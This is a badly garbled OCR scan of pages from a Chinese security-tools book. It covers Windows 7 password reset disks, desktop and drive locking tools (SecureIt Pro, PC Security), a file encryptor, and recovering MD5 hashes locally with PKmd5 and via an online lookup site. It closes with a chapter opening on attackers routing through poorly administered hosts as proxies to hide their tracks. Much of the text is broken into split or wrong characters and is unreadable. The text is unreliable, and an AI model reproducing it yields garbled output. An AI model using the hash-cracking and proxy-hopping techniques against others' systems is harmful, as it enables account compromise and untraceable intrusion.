打开 “控制 面板 ”窗口 ， 在 “大 图 标 ” 查看 方式 下 在 “用 户 账户 ”窗口 中 单 击 “ 创 建 密码 重 设 盘 ” 链 接 。 
单 击 “ 用 户 账户 ”链接 。 
ER 羊 击 “下 一 步 ” 按 钮 STEP04: 选择 创建 密 钥 盘 的 驱动 器 


忘记 密码 向 导 
欢迎 使 用 忘记 密码 向 导 


WE 
密码 多 少 次 ， 您 只 需要 创建 此 盘 一 


创建 密码 重 置 盘 
名 号 将 把 此 用 户 帐 户 的 密码 信息 保存 到 下 面 的 驱动 器 中 的 磁盘 上 。 


我 想 在 下 面 的 驱动 器 中 创建 一 个 密码 密 钥 盘 几 ) : 


其 二 ; 任何 人 都 可 以 用 此 盘 重 置 密码 ， 并 由 此 访问 此 ws 可 移动 磋 盘 全 :】 


| 密码 恢复 信息 ，i 
Re mi 


单 击 “ 下 一 步 ” 继 续 。 


弹出 “忘记 密码 向 导 ” 对 话 框 , 单 击 "下 一 步 " 按钮 。 图 选择 将 密 钥 盘 安装 在 辆 单 击 “ 下 一 步 ” 按钮 。 


U 盘 中 。 
STEP05: 输入 当前 用 户 账户 的 密码 
忘记 窗 码 向 导 
当前 用 户 帐户 密码 
此 向 导 需 要 知道 用 户 帐户 的 当前 密码 。 
短语 如 笛 们 入 侨 昌 名 各 由 三 然后 答 和 当前 用 户 王 户 密 友 。 如 果 此 帐户 
当前 用 户 帐户 密码 CC): 
000008 输入 当前 账户 的 登录 密码 。 


单 击 “ 下 一 步 ” 按 钮 。 
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《 仿 。 在 Windows 7 系统 中 创建 密码 重 置 盘 后 ， 该 工具 适用 于 当前 系统 中 的 所 有 


提示 。 管理 员 账 户 和 标准 账户 。 


STEP06: 正在 创建 密码 重 置 盘 STEP07: 完成 创建 


正在 创建 密码 重 置 磁盘 完成 忘 1 
请 稍 候 ， 向 导 正在 创建 谱 盘 。 正在 完成 忘记 密码 向 导 


一 一 一 所 mr 
进度 :100% 已 完成 拉 此 标记 为 “密友 重 轩 ”， 并且 将 它 保存 在 安全 的 


若 要 关闭 此 [名 号: 请 单 击 “ 完 成 ”。 


创建 完成 后 , 单 击 “ 下 一 步 ” 按 钮 。 单 击 “完成 ”按钮 ， 完 成 密码 重 置 盘 的 创建 。 
STEP08: ”选择 要 重 置 密码 的 账户 STEP09: 提示 用 户 名 或 密码 错误 


(X) Fer e a 


I 


重新 启动 计算 机 ， 在 系统 登录 界面 选择 要 重 置 密码 ”如 果 输 入 错误 的 密码 ， 则 会 提示 用 户 名 或 密码 不 正 
的 用 户 账户 。 确 ， 单 击 “ 确 定 ” 按 钮 。 
STEP10: 选择 重 设 密码 国 二 症 击 “下 一 步 ” 接 锂 


欢迎 使 用 密码 重 置 向 导 


您 忘 i 9 密码， 无 ， 此 向 叶 
相 杂 训 记 二 共有 因 记 帐户 的 守 码 无 法 有 登录， 此 向 
省 要 使 用 此 向 导 ， 您 必须 先 创 建 了 一 张 密码 重 置 


客 码 提示 于 23456 单 击 “ 下 一 步 ”继续 。 


I hu 


i 


单 击 “ 重 设 密码 ”链接 ,选择 重新 设置 登录 密码 。 ”弹出 “ 重 置 密码 向 导 ” 对 话 框 , 单 击 “ 下 一 步 ” 按钮 。 
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STEP12: ”选择 密 钥 盘 所 在 位 置 


一 


重 置 者 三 向 导 区 对 
插入 密码 重 置 盘 
向 导 将 使 用 磁盘 中 的 信息 来 帮助 您 重 置 密码 。 
密码 密 钥 盘 在 下 面 的 驱动 器 中 种 ) : 
a 可 移动 磁盘 C:) = 
人 《上 =- 步 6 中 东 三 委 曾 1 | 取消 


选择 密码 密 钥 盘 所 ” 国 单 击 “ 下 一 步 " 按钮 。 
在 的 位 置 。 


STEP14: 完成 密码 重 置 


正在 完成 密码 重 置 各 导 


好 着 多 此 用 户 帐 户 成 力量 于 了 密码 。 。 您 将 可 以 用 此 


i 


若 要 关闭 此 | 号， 请 单 击 “ 完 成 ”。 


至 此 完成 密码 重 置 的 操作 ， 单 击 “ 完 成 ”按钮 。 


10. 
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STEP13: ”设置 新 密码 


重 置 用 户 帐户 密码 
您 将 可 以 用 新 密码 登录 到 此 用 户 帐户 。 


Ee 此 密码 将 着 换 | 旧 的 密码 ， 此 帐户 的 所 


为 
有 
输入 新 密码 : 

介意 意 当 意志 总 总 章 


再 次 输入 密码 以 确认 : 
bho sh dhsha hecho 


输入 一 个 密码 提示 : 


上 - 步 电 | 下- 步 中 网 


输入 新 密码 以 及 单 击 “ 下 一 步 ” 按钮 。 
密码 提示 。 


STEP15: 输入 新 密码 


RE 


输入 新 密码 。 国 单 击 “ 登 录 ” 按钮 即 可 进入 
系统 桌面 。 


3.3 ”使 用 Secureit Pr0 给 系统 桌面 加 把 超级 锁 


为 了 避免 别人 动用 目 己 的 计算 机 ， 用 户 可 使 用 果 面 锁 软件 Securelt Pro 来 解决 这 个 问 
题 ， 该 软件 可 以 让 任何 人 《包括 目 己 ) 都 无 法 在 不 输入 正确 的 密码 情况 下 使 用 计算 机 。 


1. 生成 后 门口 令 


在 开始 使 用 Securelt Pro 前 5 因为 软件 为 了 防止 用 户 环 记 设置 的 进入 口令 》 需要 先 
填写 一 些 基 本 信息 ， 并 会 根据 这 些 信 息 目 动 生成 一 个 后 门口 令 ， 用 于 万 不 得 已 时 登录 
使 用 。 


其 体 的 操作 步 又 如 下 。 


STEP01: ”双击 应 用 程序 图 标 STEP02: 查看 初始 化 的 基本 信息 


所 You must agree to be bound by the terms of the following End Users License Agreement before you can use 
this software. Read the agreement carefully and select an option below This screen will not appear again. 信 ane [OOOC ol re Frat Tune alo 


IMPORTANT - READ THE FOLLOWING CAREFULLY -This Quantrix End User License Agreement 全 The purpose of this one-time initialization is for Securelt Pro to gather some basic information about you, so that in 
[ License ”from hereon in) is a legal agreement between you [either an individual or a single entity] and 司 case Securelt Pro disallows you to unlock your computer, you can use a special back door feature to unlock it. 
Quantris Corporation [proprietary to Danny Liu] for the Quantrix Software product this License was - 

distributed with. which includes computer software and may include associated media, printed matelials. 
and electronic documentation ("Software" from hereon in}. By installing, copying, or otherwise using the 


Software product, you agree to be bound by the Terms of this License. If you do not agree to the Terms of i : ee :+ 
this License, do not install or use the Software product. §) Securelt Pro will now guide you through the initialization tasks. Please note that you will be asked personal details 
like Name. Date of Bitth, and Place of Birth. 


This License grants You. the user [User "or Yow from hereon in] a norrexclusive License to use l 
Quantrix Software products on the Terms and Conditions of this License 中 at folow: Please press Next to continue. 


In order to use this software you must agree to be bound by the terms of the above License Agreement. Do 
you agree to be bound by the terms of the above License Agreement? 


© No.| do not agree to be bound by the terms of the License Agreement Continue 


阅读 Securelt Pro 软 件 的 使 用 许可 协议 。 勾 选 “Yes， 单 击 “Next” 按 钮 。 
| agree …” 单 选 按 钮 ， 单 击 “Continue” 按 钮 。 


STEP03: 填写 注册 信息 STEP04: ”查看 自动 生成 的 后 门口 令 


酝 Securelt Pro First Time on | 本 Securelt pro First Time I 


Quantrix can better assist you in lockout issues if you provide us with the given information. ( Your personalized back door code is used if you are locked out of your computer. You will be asked to enter this 
code along with your details in order to regain access to your computer. Make sure you remember this code or 


Of course, this is purely voluntary. You do NDT have to send this information to Quantris if you do not wish to do write it down. 
30. 


2 | For security's sake, please type in your back door code below to confrm it: 外 Personalized Backdoor Code: [IERGIEZSQG6JXYNBERCXZ0 
Please write down this code and keep it in a safe place. You will need this code if you ever run into strife with 
| 2 Pro. Do NOT disclose this code to anybody - people who know this code may be able to activate the 
ack door. 


Please keep this code in a safe place. Remember how you entered your personal details too -1 write this Gode domn and keon in a eafo lade. 


activate the back door feature. they must be entered exactly as they have been entered. 


单 击 “Next” 按 钮 。 单 击 “Next” 按 钮 。 


STEP05: 填写 前 面 自动 生成 的 后 门口 令 ”STEP06: 初始 化 完成 
Securelt Pro First Time Initialization ne secre Pro First Time nitalizotior 也 


Quantrix can better assist you in lockout issues if you provide us with the given information. 的 Initialization complete. You can now start using Securelt Pro. 


Of course, this is purely voluntary. You do NOT have to send this information to Quantriz if you do not wish to do 


Ea Thankyou for your time. Click the large button below to start using Securelt Pro. 
For security's sake. please type in your back door code below to confiim it: @ 9 a 


Please note: To access Securelt Pro's back door function in the event of 
lockout, Shift+Ctriz+RightClick the lock symbol at the top left-hand corner 


| the Main Interface. 


Please keep this code in a safe place. Remember how you entered your personal details too -1 iE ey Remeber this. because Quantrix will not release this 
activate the back door feature. they must be entered exactly as they have been entered. 虽 information to any users! 


¢Erevious | 
单 击 “Next” 按 钮 。 单 击 右 下 角 的 [a 按钮 。 


STEP07: 查看 提示 信息 


0 The information you have entered cannot be changed once 
finalized. Ensure that everything you have entered is correct. You 


will not be able to change this information later. 提示 i 已 输入 的 信息 不 能 更 改 ， 是 否 继续 ? 】 ， 单 击 
A ish t d? S 、 、 和 
re you sure you wish to procee “ 星 ” 按钮 ， 即 完 成 整个 初 始 化 操作 。 


在 因 遗 起 密 码 而 被 锁定 时 ， 如 果 想 使 用 后 门口 令 ， 请 使 用 《Shiftt+Ctrl1〉 组 


注意 ” 合 键 并 石 击 Securelt Pro 程序 主 界面 左上 角 的 锁定 标记 钼 。 


LA 


225 


工具 全 攻略 


= 
全 人 人 他 

2. 设置 登录 口令 

在 开始 使 用 Securelt Pro 之 前 ， 先 要 设置 进入 的 口令 。 以 后 才能 利用 这 个 口令 来 锁定 计 
算 机 。 有 其 体 的 操作 步骤 如 下 。 
STEP01: ”再 次 双击 应 用 程序 图 标 STEP02: ”再 次 输入 口令 


四 Securelt Pro | | | 让 Securelt Pro - Password Verification Requi 


Securelt Pro is currently unlocked. 


让 Please verifly wour Password by entering it again in the box below. 


Cancel 


弹出 “Securelt Pro” 对 话 杠 ， 在 “Password " 文 ”输入 相同 口令 后 , 单 击 “OK” 按 钮 ,计算 机 将 进入 
本 框 中 输入 口令 ， 单 击 “Lock” 按 钮 。 锁定 状态 。 


3. 如 何 解 锁 

在 锁定 状态 下 ， 他 人 只 能 在 加 而 上 看 到 一 个 “Securelt Pro-Locked” 对 话 框 ， 如 下 图 所 示 ， 
其 他 信息 (如 原 有 程序 ) 都 呈现 不 可 见 状 态 。 任 何人 都 必须 输入 正确 口令 并 单 击 “Unlock” 按 钮 
才能 进入 计算 机 。 他 人 也 可 以 给 为 计算 机 设 定 锁定 状态 的 用 户 留 言 ， 当 用 户 回 到 计算 机 前 后 束 能 
全 入 


You can leave a message for the user who locked Securelt Pro below: 


Name: | 


Message: ] 


Clear | Save | 


“Securelt Pro-Locked” 对 话 框 


10.3.4 ”系统 全 面 加 密 大 师 PC $ecurity 


系统 级 的 加 密 工 具 PC Security 可 以 帮助 用 户 锁定 因特网 、 任 何 文件 与 目录 、 任 何人 破 盘 
分 区 、 系 统 等 。 

1. 锁定 驱动 器 

PC Security 锁定 驱动 器 使 用 很 方便 , 以 锁定 存储 有 重要 文件 的 D 盘 为 例 , 在 PC Security 
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安装 完毕 后 , 在 “计算 机 ”窗口 中 右 击 D 盘 盘 符 ,， 从 快捷 这 单 中 选择 “PC Security”> “Lock” 


命令 ， 


即 可 完成 对 D 盘 的 锁定 操作 。 


打开 (O) 

在 新 窗口 中 打开 (E) 

运行 “私人 磁盘 ” 

使 用 ACDSee pro 6 管理 
画 ”局 用 BitLockerfB).… 


共享 (H) 

一 链 备 份 到 115 网 盘 (B) 
还 原 以 前 的 版 本 (W) 
包含 到 库 中 辐 

PC Secunlty 


使 用 360 杀 过 扫 搞 
使 用 360 交 件 堡 芭 保护 
WInRAR 


痢 式 化 [和 A).. 
复制 ( 吕 ) 


创建 快捷 方式 (S) 
重 命名 (M) 


尾 性 (R) 


2. 锁定 系统 


| a 


本 地 磁盘 [E:) 


130 GB 可 用 , 共 131 GB 


到 Unlock 
加 Unlock and Open 


PC Security 可 以 完成 多 种 方式 的 系统 锁定 ， 下 向 逐一 进行 讲述 。 
1) 即时 锁定 系统 。 如 来 需要 暂时 离开 计算 机 ， 为 防止 他 人 恶意 操作 目 己 的 计算 机 ， 就 
可 以 即时 锁定 目 己 的 计算 机 系统 。 上 基体 的 操作 步 缀 如 下 。 


STEP01: 运行 PC Security 


ecurity(tm) 


Warning: The password is still “SECURITY”, please change it as soo. 


在 “Password ”文本 框 中 输入 正确 的 登录 密码 ( 默 
认为 Security) ， 并 单 击 “ENTER” 技 钮 。 


STEP02: “PC Security” 操作 管理 


- 
加 Home Page - PC securityttm 
Action View Help Register 


人 染 口 涓 回 口 区 国 守 号 9 Dz 


人 
be 


SEEcuURITY 


Buy PC SecurityD Register 


压 
STEALTHKENCRYPTOR 
f 在 


Restricted System Off 


单 击 “System Lock” ( 系统 锁定 ) 链接 。 


过 2 


ST IF 一 一 


PE 
STEP03: 系统 锁定 


工具 全 攻略 


I | System Lock - PC Securityltm) 
| Action View Help Register 


| 各 口误 回 品 多 国宝 电 9 入 地 | 昌 限 | 才 


-Lock Schedule Lock the Computer Now 单 击 Lock the Computer Now” 按钮 ， 当前 系统 
[Lock After [20 =] in-active minutes 将 自 动 切换 到 类 似 屏 幕 保 护 的 状态 半 弹 出 密码 


Settings ] . 
厂 Lock on Startup | 输入 ” 对 话 框 ， 只 有 输入 PC Security 的 登录 密码 才 
fw Hide the Screen VWhen Locked | 、 

[lv Monitor Mouse Moves | 能 恢复 系统 的 正常 使 用 状态 s 
[Ask Password for Shutdown | 
矿 Lock Internet 


Hot Key: 
大 Set Hot Key | | 


2) 有 尼 动 时 锁定 系统 。 采 用 局 动 时 锁定 系统 功能 ， 可 彻底 解决 Windows 7 系统 无 需 密 公 
束 登 录 系 统 的 安全 隐患 。 在 功能 局 用 后 ， 当 用 户 登 录 Windows 7 系统 时 ， 在 “登录 ”对 话 
框 中 单 击 “ 确 定 ” 按 钮 ， 将 会 目 动 进入 类 似 屏 幕 傈 护 状 态 的 PC Security 登录 状态 。 使 用 方 
法 很 徐 单 ， 只 须 勺 选 系 统 锁定 界面 中 的 “Lock on Startup” 复 选 框 即 可 。 


国 system Lock - PC =curity(tm) 
| Action View Help Register 


| 机 口 汝 回 品 音 国 完 电 9 时针 Cz 


Lock Schedule Lock the Computer N 
[WUse tock Scheduer | Use Lock 5cheduler: locktheComputerNow | 
Monday - Friday 5aturday.5unday 厂 Lock 上 fter [30 "| in-active minutes 


-Settings 


勾 选 “Lock on Startup” 复 选 框 。 
ww Hidethe Screen WhenLocked 

Jw Monitor Mouse Moves 

[Ask Password for Shutdown 

厂 Lock Internei 


Hot Key: | 
鞠 Set HotKey | | 


3) 指定 时 间 锁 系统 。 若 义 选 “Lock After…in-active minutes” 复 选 枉 ， 在 数值 栏 中 输 
入 所 需 的 数字 后 ，PC Security 束 会 目 动 在 指定 的 无 活动 时 间 后 将 系统 锁定 。 


ee 


Action View Help Register 


贷 口 涛 回扣 大 国宝 多 9 外包 


-Lock Schedule | Lock the C ter 及 
fw Use Lock Scheduler: 一 


Monday - Friday Saturday. Sunday 区 Lock After [30 了 | 也 本 勾 选 i Lock After We in-active minutes 9 复 选 框 。 


广 Settmgs- 


IY Hide the Screen When Locked 
IJ Monitor Mouse Moves 

厂 ask Password for Shutdown 
厂 Lock Internet 


Hot Key: 
鞠 Set Hot Key | 
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4) 锁定 酒 动 窗口 。 如 果 用 户 在 运行 程序 时 来 了 一 个 朋友 要 借用 一 下 计算 机 ， 这 个 时 候 
往往 不 方便 将 正在 运行 的 程序 关闭 ， 但 又 不 想 让 朋友 打开 正在 运行 的 程序 。 这 个 看 起 来 很 
且 烦 的 问题 ， 通 过 PC Security 将 会 很 容易 地 被 解决 。 具 体 的 操作 步 又 如 下 。 


STEP01: 返回 操作 管理 界面 STEP02: 打开 “窗口 锁定 ”设置 界面 
面 Home Page -PC See 面 Wndow od -Pe ec : -二 回避 -Xe | 
Action View Help Register | Action View Help Register 
闸口 酒 回 扎 轨 国 宣 电 @ | 和 | 世人 愉 | 贡 借口 溯 回 口 基 国人 完 归 9 对 Oz 
: Tile Search Sting = a 
有 Bemove Selected 
又 © Disable 
\ © Invisible 
P C cuRrRITY a 
厂 Search Child Widows ‘WatTime: [5 Seconds 
Window Tites Found Lock Type WinHande 让 
Unlock Wndow 
Misc. Options: 
Lock Deskiop 
厂 Lock Iaskbar 
厂 Hide System Tiay 
| Hee 
Locks this prog = 二 ee _ IRestri tem Off ISecurity On | Locks this program | Restncted System Off Securty On __ 
单 击 “Windows Lock ” (窗口 锁定 ) 链接 。 单 击 “Add Tittle Pattern” 按 钮 。 
STEP03: 添加 一 个 搜索 标题 STEP04: 返回 “窗口 锁定 ”设置 界面 


Add a Title Search String... 国 Window Lock -PC Scour 


Action View Help Register 


雪 口 油 四 让 切 国 宇 曙 9 六 也 个 阳 击 


Se ee 国人 bea 
Pick a title or an already existing window from the 
drop down list or type your ownm and hit enter. 


厂 Search Child Windows 
Window Tiles Found 


国 单 击 “Window Title” 右 侧 单 击 “OK" 选择 “Disable" 或 国 单 击 “Relock Window” 


下 三 角 按 钮 ， 在 当前 运行 程序 。” ”按钮 。 “Invisible” 等 单 选 按钮 。 ”按钮 ， 可 看 到 选中 的 程 
列表 中 选择 要 锁定 的 程序 。 序列 表 ， 以 及 当前 程序 
为 禁止 使 用 状态 


5) 锁定 程序 。 如 果 系 统 中 有 一 些 很 重要 的 程序 不 方便 被 其 他 人 使 用 ， 也 可 以 使 用 PC 
Security 来 完成 程序 的 锁定 。 在 登录 操作 管理 界面 中 单 击 “Program Lock”( 程 序 锁定 ) 链 
接 ， 即 可 打开 程序 锁定 设置 界面 。 通 过 展开 目录 选中 须 锁 定 的 程序 ， 单 击 中 间 的 锁定 方式 
(只 读 或 完全 )， 单 击 “Lock” 按 钮 ， 即 可 锁定 程序 。 

3. 验证 加 密 效果 

究 苋 锁定 目录 对 于 非法 用 户 有 没有 访问 约束 力 呢 ? 先 使 用 PC Security 将 服务 右 D 柱 下 
的 IMA 目录 锁定 ， 通 过 局 域 网 中 的 另 一 侣 计算 机 对 服务 器 进行 木马 控制 ， 此 时 会 发 现 远 程 
控制 也 无 法 读 取 服务 器 中 锁定 的 IMA 目录 。 
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工具 全 攻略 


黑客 过 


合 人 他 他 


如 果 恶 意 用 户 想 通过 网 络 将 PC Security 凶 载 后 进行 信息 鳃 取 ， 则 他 们 可 能 将 会 非常 失 
望 ， 因 为 PC Security 必须 在 输入 密 公 后 才 可 加 载 。 


10.4 


加 密 解密 工具 


10:4.1 “加 客 精 灵 ” 加 密 工 具 


加 密 精 琴 是 一 球 加 密 速 度 极 快 且 功能 强大 的 国产 加 密 工 具 ， 可 用 于 加 密 任何 格式 的 文 
件 ， 几 乎 集成 了 当前 所 有 加 密 工具 的 功能 。 
利用 加 密 精 灵 可 以 加 密 任 何 格式 的 文件 ， 其 加 和 蜜 的 共 体 步骤 如 下 。 


STEP01: 运行 加 密 精 灵 应 用 程序 STEP02: 开始 加 密 


-选择 文件 夹 
文件 来 路 径 |E: "Pragram Fi 


一 主 功能 区 


1 


输入 密码 


登陆 管理 | 高 级 | 注册 | 退出 | 
_ 已 加 密 交 件 夹 列表 | 解密 时 点 击 文件 来 路 径 项 则 选中 ]- Iv 快速 加 密 。 三 移动 加 密 ”厂家 全 加 密 


2 oy Ca ae pa 
So ro 


JI 

至 
单 击 “ 浏 览 ”按钮 ， 国 单 击 “加密 ” 按 钮 。 输入 密码 并 选择 加 密 类 型 . 国 单 击 “提交 " 按钮 。 
选择 要 加 密 的 文件 。 


STEP03: ”加密 完成 


-选择 文件 
文件 来 路 径 [E: ‘Pr ogran Files 个 洲 全 下 
_ 主 功能 区 

加 密 | 隐藏 | 伪装 | 粉碎 | 解 密 | 
-辅助 功能 区 
登陆 管理 | 。。” 更换 皮肤 | 高 级 | 注册 | 退出 | 
_ 已 加 密 文件 夹 列表 [解密 时 点 击 文件 来 路 径 项 则 选中 ] 


ET 过 TT 在 已 加 密 文件 夹 列表 中 可 以 查看 已 经 加 密 的 文件 夹 。 


4 | 


om en]| 
射 猎 者 软件 工作 室 [Soarersoft studio】 查看 更 新 


解密 的 过 程 与 加 密 过 程 相似 ， 步 又 如 下 。 
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STEP01: 打开 主 界 面 STEP02: 开始 解 窗 


EE 
一 选择 文件 来 
文件 夹 路 径 “| 了 :AProgran Files 


- 主 功 能 区 


加 密 隐藏 伪装 粉碎 解 密 
加密 | 


-辅助 功能 区 
登陆 管理 | 更 换 皮 肤 高 级 | 注册 | 退出 | 
已 加 密 诡 件 夹 列表 [ 解 密 时 点 击 文件 来 路 径 项 , 则 选中 ] 


文件 来 路 径 | | 状态 日 期 | 和 

了 :AProgram Files | 快 束 加 UT 
辆 单 击 “浏览 ”按钮 单 击 工具 栏 上 的 ”输入 密码 并 单 击 “ 提 交 ” 按 钮 即 可 完成 解密 。 
选择 要 解密 的 文件 。 “解密 ”按钮 。 


10;4.2 ”MD35 加 密 解 密实 例 


MD5 (Message-digest Algorithm 5， 信 息 - 摘 要 算法 ) 密码 转换 器 主要 是 对 数据 进行 
MD5 算法 转换 ，ASP 数据 库 几 乎 都 是 这 样 加 蜜 的 。 虽 然 解 蜜 比较 困难 ， 但 解密 效果 不 错 ， 
使 用 这 个 软件 加 密 的 密码 很 少 有 人 能 猜 出 来 。 随 看 MD5 密码 的 流行 ， 破 解 MD5 的 方法 也 
越 来 越 多 ， 下 和 面 上 曝光 MD5 是 如 何 本 地 破解 和 在 线 破 解 的 。 

1，PKmds 加 密 

使 用 PKmd5 可 以 很 方便 地 将 一 组 字符 用 MD5 方式 完成 加 窗 ， 上 基体 的 操作 方法 
如 下 。 


STEP01: 运行 PKmd5 STEP02: 开始 加 窗 


刻 PKmd5 By: 薄 乐天 QQ:1477696708 刻 PKmd5 By: 薄 乐天 QQ:1477696708 


功能 ”帮助 
Ms 加 密 


[123456 


加 密 效 果 
49BASI9ABBESBEOST 


暂 只 支持 1 入 加密 


加 寅 成 功 : 123456 2013712717 11:24:43 


wi 


单 击 “MD5 加 密 ” 按 钮 。 输入 要 转 国 单 击 " 一 键 加 密 "按钮 , 加 密 后 的 
换 的 字符 。 。 密 文 将 显示 在 “加 密 效果 ”文本 框 中 。 
2. 本 地 破解 MDS 
现在 破解 MD5 加 密 的 软件 有 很 多 ， 而 PKmd5 这 个 工具 简单 易学 ， 是 黑客 常 使 用 的 工 
具 之 一 。 
使 PKmd5 进行 密码 破解 的 具体 操作 步 又 如 下 。 
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工具 全 攻略 
仿 亿 所 性 
STEP01: 打开 PKmd5 主 窗口 STEP02: MD5 解密 


曾 PKmd5 By: 薄 乐天 QQ:1477696708 曾 PKmd5 By: 萍 乐天 QQ:1477696708 


49BA5 9ABBE56EO57 


单 击 “MD5 解 密 ” 按 钮 。 国 输入 要 破解 的 MD5 密 码 ， 国 单 击 “ 一 键 解密 ” 
并 选择 破解 方式 。 按钮 。 


STEP03: 查看 解密 结果 


名 PKmd5 By 蒲 乐 天 QQ:1477696708 


| 功能 “帮助 
MD5 和 解密 


149BA59ABPFE56E057 


破解 方式 : 个 极速 破解 ”全 标准 破解 
范围 设置 上 [未 软件 识 能 破解 缉 数 字 的 MD5 密 六] 
起 冶 值 : 斤 23456 终止 情 :[399939 解码 数 :|859999 


初始 化 数据 完成 ! 共 899999 个 猜 解 码 、 加 
0 在 下 方 文本 框 中 查看 解密 结果 。 


解密 成 功 : 123456 2013:11:8 16:17:58 


3. 在 线 破解 MDS 
相对 于 本 地 破解 ,在线 破解 就 容易 得 多 了 ,现在 也 有 很 多 能 够 在 线 人 破解 MD5 的 网 站 (如 
http://www.xmd5 .org )。 


STEP01: 打开 Internet Explorer 浏览 器 。 STEP02: ”MD5 解密 


页 面 (P) x 安全 (S$S) ”工具 (O) > 
如 把 hao123 设 为 主页 桌面 版 


hdo123 


在 地 址 栏 中 输入 “http:/www.xmd5.org/” 后 按 下 ”将 要 破解 的 MD5 密 文 输入 到 文本 框 中 , 然后 单 击 
<Enter> 键 。 “MD5 解 密 ” 按 钮 。 
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STEP03: 查看 破解 结果 


在 “MD5 解 密 ” 按 钮 下 方 会 出 现 解密 结果 。 


10;:4.3 用 “私人 磁盘 ”隐藏 大 文件 


“私人 位 盘 ”软件 十 一 球 极 好 的 文件 和 文件 夹 加 密 保护 工具 ,能 够 在 各 个 健 盘 分 区 中 创 
建 加 密 区 瑾 ， 并 将 加 密 区 虚拟 成 一 个 磁盘 分 区 以 供 使 用 。 该 虚拟 的 磁盘 分 区 和 实际 的 磁盘 
分 区 完全 一 样 。 用 户 可 以 在 其 中 存放 文件 资料 ， 也 可 以 将 软件 、 洲 戏 安 装 在 里 面 。 

1.“ 私 人 磁盘 ”的 创建 

“私人 磁盘 ”为 绿色 软件 ， 下 载 并 解压 后 ， 和 直接 双击 即 可 进入 主 操作 界面 执行 相应 的 操 
作 ， 包 括 人 创建、 删除、 打开、 修改、 关闭 私 人 磁盘 等 操作 。 

创建 “私人 磁盘 ”的 具体 操作 步骤 如 下 。 

STEP01: 打开 软件 ”STEP02: 打开 微型 主 界面 STEP03: 切换 到 完整 主 界 面 


创建 私信 磁 动 俩 除 私人 磋 动 
1 | | 
初始 密码 为 空 ， 无 需 输入 界面 中 列 出 了 现 有 的 磁 ”在 完整 界面 中 进行 用 户 密码 设置 。 
密码 , 直接 单 击 “确定 ” 按 盘 分 区 ， 单 击 标题 栏 的 


钮 。 “ 变 " 按钮 。 
STEP04: 创建 私人 磁盘 STEP05: ”私人 磁盘 创建 完成 
8 le 日 
私人 磁盘 文件 列表 呐 击 建立 、 打 开 ) 私人 陪 盘 文件 列表 区 击 建 立 、 打开) 
操作 选择 A Ne 
外 | 建 私人 而 盟 | 侧 除 私人 辜 僵 作 建 私人 研 二 体外 私人 成 二 
仙 开 私人 磁 支 | 侨 闭 私人 磁 支 入 开 私人 陪 般 侨 闭 私人 磁 动 
答 改 赔 盘 室友 | 筷 人 磁盘 设置 息 改 碰 盘 密友 最 人 说 各 设置 
条 统 雪 全 设 蝇 | 乳 人 磁盘 工 月 条 统 云 全 设 加 多 人 磁盘 工 朋 
(Ep 载 本 软件 和 (软件 注册 (工本 软件 (软件 主 册 
f 软件 言 网 | 人 退出 程序 了 f 软件 官网 了 《退出 程序 
问 启用 移动 蔓 支 持 
先 在 私人 磁盘 文件 列表 单 击 “创建 私 ”完成 私人 磁盘 创建 的 分 区 卷 标 右 侧 会 出 现 一 个 “六 ” 
中 单 击 选择 分 区 。 人 人 磁盘” 按钮。 形状 的 标志 。 
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Py > 
和- 工具 全 攻略 


© 1 ) 一 个 分 区 上 只 能 创建 一 个 私人 磁盘 ， 如 果 创 建 多 个 ， 会 出 现 出 错 
提示 


提示 2 ) 由 于 私人 磁 益 空间 是 从 各 个 磁 枪 分 区 的 剩余 空间 中 分 离 出 来 的 ,， 因此 私 
人 磁 郁 的 个 数 和 大 小 受 实际 分 区 和 和 所 剩 空 间 的 限制 。 


STEP06: 查看 生成 的 私人 磁盘 


文件 日 ” 敌 渐 但 ” 重 吞 久 ) 工 号 四 帮助 是 


sem er 单 击 “ 操 作 选 择 ” 选 项 组 中 的 “打开 私人 磁盘 ” 按 

和 本 | 钮 或 打开 “计算 机 ”， 就 会 发 现 多 出 了 两 个 磁盘 分 
me | 区 一 磁盘 分 区 G 和 |， 它们 的 卷 标 和 源 磁盘 分 区 的 
卷 标 一 致 ， 如 果 需 要 使 用 它 ， 可 在 “计算 机 ”中 像 
打开 普通 磁盘 一 样 打开 它 :。 


在 虚拟 的 磁盘 分 区 中 进行 文件 操作 和 在 普通 磁盘 中 相同 ， 只 是 不 能 进行 格 
式 化 探 作 。 


STEP07: 和 返回 完整 主 界 面 STEP08: 私人 磁盘 设置 


ee 反击 建立 、 i 


个 打开 私人 磁盘 时 使 用 固定 盘 符 : 
全 由 程序 自动 分 配 私人 磁盘 盘 符 
创建 私人 说 骨 他 除 私人 辜 裔 由 人 磁盘 密码 设置 


有 全 天 NA 办 全 创建 私人 磁盘 文件 时 不 设置 密码 
EC 广 允许 各 个 私人 了 磁盘 分 别 设置 密码 
Sr 和 了 同 A 
(TN (rE 
人 软件 官网 人 退出 程序 


单 击 “私人 磁盘 设置 ”按钮 。 可 进行 盘 符 设置 、 私 人 磁盘 密码 设置 等 。 


2.“ 私 人 磁盘 ”的 删除 

删除 创建 的 秘 人 磁盘 正好 与 创建 私人 磁盘 的 操作 相反 。 只 体 的 操作 步 又 如 下 。 

在 主 界面 中 选择 将 删除 的 私人 磁盘 ， 单 击 “ 换 作 选 择 ” 选 项 组 中 的 “删除 私人 磁盘 ” 
按钮 ， 即 弹出 “确认 ”提示 框 , 如 下 图 所 示 , 提示 是 合 删 除 。 如 条 确定 要 删除 ， 则 后 击 “ 是 ” 
按钮 。 因 为 这 个 操作 会 删除 捷 有 存在 私人 磁盘 里 的 文件 ， 所 以 一 定 要 证 导 。 将 私人 磁盘 删 
除 后 打开 “计算 机 ”时 ， 即 可 看 到 所 创建 的 私人 磁盘 已 经 消失 。 
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10 章 
密码 攻防 


© 在 私人 磁盘 中 进行 的 所 有 操作 都 与 普通 分 区 中 的 操作 相同 。 删 除 私 人 磁盘 
提示 中 的 文件 同样 要 经 过 “回收 站 ”。 
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为 了 更 好 地 隐藏 自己， 黑客 在 攻击 前 往往 会 先 找 一 些 管理 员 水 平 不 高 的 网 
络 主机 作为 代理 服务 器 ， 再 通过 这 些 主机 攻击 目标 计算 机 。 正 是 有 了 这 些 代 理 服 
务 器 ， 黑 客 的 行踪 才 不 容易 被 发 现 ， 这 样 黑 客 就 可 以 建 无 总 习 地 进行 攻击 。 


O “代理 猎手 ”、SocksCap32 代理 服务 器 软件 的 使 用 
O 远程 跳板 代理 攻击 曝光 
O 实战 IP 追踪 技术 


O 〇 O NeroTrace Pro 追踪 工具 的 使 用 


< 第 1 章 
网 络 代理 与 奶 蹊 扩 木 


11.1 代理 服务 器 软件 的 使 用 


